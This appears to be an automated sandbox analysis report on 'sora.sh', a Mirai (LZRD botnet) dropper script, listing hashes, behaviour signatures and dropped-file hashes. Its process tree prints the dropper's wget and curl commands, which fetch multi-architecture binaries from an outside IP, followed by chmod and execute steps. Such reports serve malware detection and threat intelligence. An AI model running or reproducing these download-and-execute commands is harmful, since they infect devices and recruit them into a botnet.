Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    29-08-2024 20:19

General

  • Target

    sora.sh

  • Size

    1KB

  • MD5

    4bad6b7a8f3a112f1e8a64415b2c5e57

  • SHA1

    80386ebec3b511cd2a07da88e300a62590b8d889

  • SHA256

    4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77

  • SHA512

    da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (19828) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:715
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:717
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:729
    • /bin/cat
      cat sora.x86
      2⤵
        PID:742
      • /bin/chmod
        chmod +x robben sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
        2⤵
          PID:743
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          PID:744
        • /usr/bin/wget
          wget http://154.216.17.67/bins/sora.mips
          2⤵
          • Writes file to tmp directory
          PID:747
        • /usr/bin/curl
          curl -O http://154.216.17.67/bins/sora.mips
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:749
        • /bin/cat
          cat sora.mips
          2⤵
            PID:750
          • /bin/chmod
            chmod +x robben sora.mips sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
            2⤵
              PID:751
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Reads runtime system information
              PID:752
            • /usr/bin/wget
              wget http://154.216.17.67/bins/sora.mpsl
              2⤵
              • Writes file to tmp directory
              PID:759
            • /usr/bin/curl
              curl -O http://154.216.17.67/bins/sora.mpsl
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:760
            • /bin/cat
              cat sora.mpsl
              2⤵
                PID:761
              • /bin/chmod
                chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                2⤵
                  PID:762
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  PID:763
                • /usr/bin/wget
                  wget http://154.216.17.67/bins/sora.arm4
                  2⤵
                    PID:765
                  • /usr/bin/curl
                    curl -O http://154.216.17.67/bins/sora.arm4
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:766
                  • /bin/cat
                    cat sora.arm4
                    2⤵
                      PID:771
                    • /bin/chmod
                      chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                      2⤵
                        PID:772
                      • /tmp/robben
                        ./robben Payload
                        2⤵
                        • Executes dropped EXE
                        PID:774
                      • /usr/bin/wget
                        wget http://154.216.17.67/bins/sora.arm5
                        2⤵
                        • Writes file to tmp directory
                        PID:776
                      • /usr/bin/curl
                        curl -O http://154.216.17.67/bins/sora.arm5
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:784
                      • /bin/cat
                        cat sora.arm5
                        2⤵
                          PID:793
                        • /bin/chmod
                          chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                          2⤵
                            PID:794
                          • /tmp/robben
                            ./robben Payload
                            2⤵
                            • Executes dropped EXE
                            PID:796
                          • /usr/bin/wget
                            wget http://154.216.17.67/bins/sora.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:798
                          • /usr/bin/curl
                            curl -O http://154.216.17.67/bins/sora.arm6
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:807
                          • /bin/cat
                            cat sora.arm6
                            2⤵
                              PID:821
                            • /bin/chmod
                              chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                              2⤵
                                PID:822
                              • /tmp/robben
                                ./robben Payload
                                2⤵
                                • Executes dropped EXE
                                PID:823
                              • /usr/bin/wget
                                wget http://154.216.17.67/bins/sora.arm7
                                2⤵
                                • Writes file to tmp directory
                                PID:826
                              • /usr/bin/curl
                                curl -O http://154.216.17.67/bins/sora.arm7
                                2⤵
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:828
                              • /bin/cat
                                cat sora.arm7
                                2⤵
                                  PID:829
                                • /bin/chmod
                                  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                                  2⤵
                                    PID:830
                                  • /tmp/robben
                                    ./robben Payload
                                    2⤵
                                    • Executes dropped EXE
                                    PID:831
                                  • /usr/bin/wget
                                    wget http://154.216.17.67/bins/sora.ppc
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:833
                                  • /usr/bin/curl
                                    curl -O http://154.216.17.67/bins/sora.ppc
                                    2⤵
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:834
                                  • /bin/cat
                                    cat sora.ppc
                                    2⤵
                                      PID:846
                                    • /bin/chmod
                                      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                                      2⤵
                                        PID:847
                                      • /tmp/robben
                                        ./robben Payload
                                        2⤵
                                        • Executes dropped EXE
                                        PID:849
                                      • /usr/bin/wget
                                        wget http://154.216.17.67/bins/sora.m68k
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:852
                                      • /usr/bin/curl
                                        curl -O http://154.216.17.67/bins/sora.m68k
                                        2⤵
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:860
                                      • /bin/cat
                                        cat sora.m68k
                                        2⤵
                                          PID:871
                                        • /bin/chmod
                                          chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                                          2⤵
                                            PID:872
                                          • /tmp/robben
                                            ./robben Payload
                                            2⤵
                                            • Executes dropped EXE
                                            PID:873
                                          • /usr/bin/wget
                                            wget http://154.216.17.67/bins/sora.sh4
                                            2⤵
                                            • Writes file to tmp directory
                                            PID:875
                                          • /usr/bin/curl
                                            curl -O http://154.216.17.67/bins/sora.sh4
                                            2⤵
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:876
                                          • /bin/cat
                                            cat sora.sh4
                                            2⤵
                                              PID:877
                                            • /bin/chmod
                                              chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
                                              2⤵
                                                PID:878
                                              • /tmp/robben
                                                ./robben Payload
                                                2⤵
                                                • Executes dropped EXE
                                                PID:879

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /tmp/robben

                                              Filesize

                                              30KB

                                              MD5

                                              bcff8f405bdd93b8488e6f6aca117a32

                                              SHA1

                                              8b32a1dea70be2c76830e3808f70ad62eb3b1250

                                              SHA256

                                              67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396

                                              SHA512

                                              5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a

                                            • /tmp/robben

                                              Filesize

                                              31KB

                                              MD5

                                              131fc41fbe66493277e3155f50b9fce5

                                              SHA1

                                              0bbb17cb882e34dc82e51862f8245f3187664beb

                                              SHA256

                                              d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f

                                              SHA512

                                              de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247

                                            • /tmp/robben

                                              Filesize

                                              33KB

                                              MD5

                                              8652e70ebc913d0078f59b2526a40d36

                                              SHA1

                                              1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4

                                              SHA256

                                              cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf

                                              SHA512

                                              ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3

                                            • /tmp/robben

                                              Filesize

                                              212B

                                              MD5

                                              45e588171939a0780c48755918b1cd74

                                              SHA1

                                              6c33e64b1a43fb6752026fd1254cac740e7c3243

                                              SHA256

                                              770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535

                                              SHA512

                                              fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770

                                            • /tmp/robben

                                              Filesize

                                              27KB

                                              MD5

                                              00d6529558e66184baaf1b0f21e59739

                                              SHA1

                                              3b9db5227c48f501573ea9b626c5c765a17e7c61

                                              SHA256

                                              fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d

                                              SHA512

                                              49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb

                                            • /tmp/robben

                                              Filesize

                                              71KB

                                              MD5

                                              a0b83eba33da68f09402235338d316a8

                                              SHA1

                                              15f3e890997e3b7f21c16eb1b0462bdf4ed11d61

                                              SHA256

                                              eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507

                                              SHA512

                                              2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79